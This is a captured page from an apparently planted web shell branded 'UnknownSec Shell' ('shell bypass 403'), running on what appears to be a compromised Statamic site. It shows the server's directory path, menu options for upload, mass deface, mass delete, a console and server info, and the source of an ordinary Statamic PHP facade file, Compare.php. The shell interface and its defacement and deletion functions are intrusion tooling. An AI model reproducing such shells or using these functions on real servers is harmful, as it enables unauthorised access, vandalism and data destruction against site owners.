shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Facades
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Compare.php
<?php namespace Statamic\Facades; use Illuminate\Support\Facades\Facade; use Statamic\Support\Comparator; /** * @method static void locale(string $locale) * @method static int values($one, $two) * @method static int strings(string $one, string $two) * @method static int numbers($one, $two) * * @see \Statamic\Support\Comparator */ class Compare extends Facade { protected static function getFacadeAccessor() { return Comparator::class; } }
© 2026 UnknownSec